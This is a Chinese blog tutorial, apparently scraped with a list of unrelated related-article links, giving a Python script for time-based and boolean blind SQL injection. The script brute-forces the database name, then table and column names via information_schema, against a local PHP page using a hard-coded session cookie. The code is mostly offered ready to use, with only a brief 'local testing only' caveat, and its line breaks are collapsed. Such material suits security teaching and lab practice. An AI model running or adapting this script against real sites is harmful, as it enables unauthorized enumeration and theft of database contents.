当前位置: 首页 > news >正文

sql注入(7), python 实现盲注爆破数据库名, 表名, 列名

python 实现盲注

该python脚本根据之前介绍的盲注原理实现, 对于发送的注入请求没有做等待间隔, 可能给目标服务器造成一定 压力, 所以仅限于本地测试使用.

import requests, time# 时间型盲注
def time_blind(base_url, cookie):for length in range(1, 20): # 测试数据库名长度 1~19start = time.time()header = {"Cookie": cookie}url = f"{base_url} and if(length(database())={length}, sleep(3.5), 1)"_ = requests.get(url=url, headers=header)end = time.time()resptime = end-startif int(resptime) >= 3:print('数据库长度为:', length)breakelse:print(url)# 布尔型盲注爆列名
def bool_blind(base_url, cookie):chars = "abcdefghijklmnopqrstuvwxyz0123456789_,"session = requests.session()base_url = base_urlheader = {"Cookie": cookie}# 先定义猜对的时候的长度resp = session.get(url=base_url + " and 1=1", headers=header)base_len = len(resp.text)# 先获取数据库长度for db_len in range(1, 20):url = f"{base_url} and length(database())={db_len}"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:breakprint(f"数据库长度:{db_len}")# 根据数据库长度猜名称db_name = ''for i in range(1, db_len+1):for c in chars:url = f"{base_url} and substr(database(), {i}, 1)='{c}'"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:db_name += cbreakprint(f"数据库名:{db_name}")# 根据数据库名称猜表名table_name = ''for i in range(1, 40):for c in chars:sql = f"select group_concat(table_name) from information_schema.tables where table_schema='{db_name}'"url = f"{base_url} and substr(({sql}), {i}, 1)='{c}'"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:table_name += cbreakprint(f"数据库中的表名:{table_name}")# 猜所有表的列名table_list = table_name.strip().split(',')for table in table_list:column_name = ''for i in range(100):for c in chars:sql = f"select group_concat(column_name) from information_schema.columns where table_schema='{db_name}' and table_name='{table}'"url = f"{base_url} and substr(({sql}), {i}, 1)='{c}'"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:column_name += cbreakprint(f"表{table}的列名:{column_name}")if __name__ == '__main__':url = "http://192.168.112.200/security/read.php?id=1"cookie = "PHPSESSID=b4d659be5e17d948fd8e18078003d3f6"time_blind(base_url=url, cookie=cookie)# bool_blind(base_url=url, cookie=cookie)
http://www.lryc.cn/news/193788.html

相关文章:

  • 2021年12月 Python(二级)真题解析#中国电子学会#全国青少年软件编程等级考试
  • 卡尔曼家族从零解剖-(01)预备知识点
  • 技术分享| 二进制部署MySQL
  • 3.1 模板测试与深度测试(Stencil Test Z Test)
  • 一些常见的必须会的谭浩强基本代码大全也是常考的应试是没问题的
  • C语言天花板——指针(进阶1)
  • 二、深度测试(Z Test)
  • Vue_Bug VUE-ADMIN-TEMPLATE-MASTER electron build后无法登录
  • 睡衣内衣服装商城小程序的作用是什么
  • idea怎么设置作者信息(详细)
  • 产品经理如何有效跟进开发进度?
  • 【已解决】Qt无法追踪到mouse移动事件
  • Dubbo从0到1——万字完整学习笔记
  • Rust初接触
  • shell脚本学习笔记03(小滴课堂)
  • 软件工程和计算机科学与技术学习方向区别
  • React常用hooks总结
  • 【算法学习】-【滑动窗口】-【找到字符串中所有字母异位词】
  • 利用python学习如何处理需要登录的网站
  • vue适配各个屏幕
  • 在conda创建的虚拟环境中安装jupyter以及使用
  • 【Java 8的新特性】
  • Android+Appium自动化测试环境搭建及实操
  • NetSuite ERP系统健康检查
  • 常用的数字格式代码
  • GitLab使用步骤
  • 基于MindSpore的llama微调在OpenI平台上运行
  • P34~36第八章相量法
  • WAF绕过-漏洞发现之代理池指纹探针 47
  • 模型预测控制(MPC)中考虑约束中的不确定性(Matlab代码实现)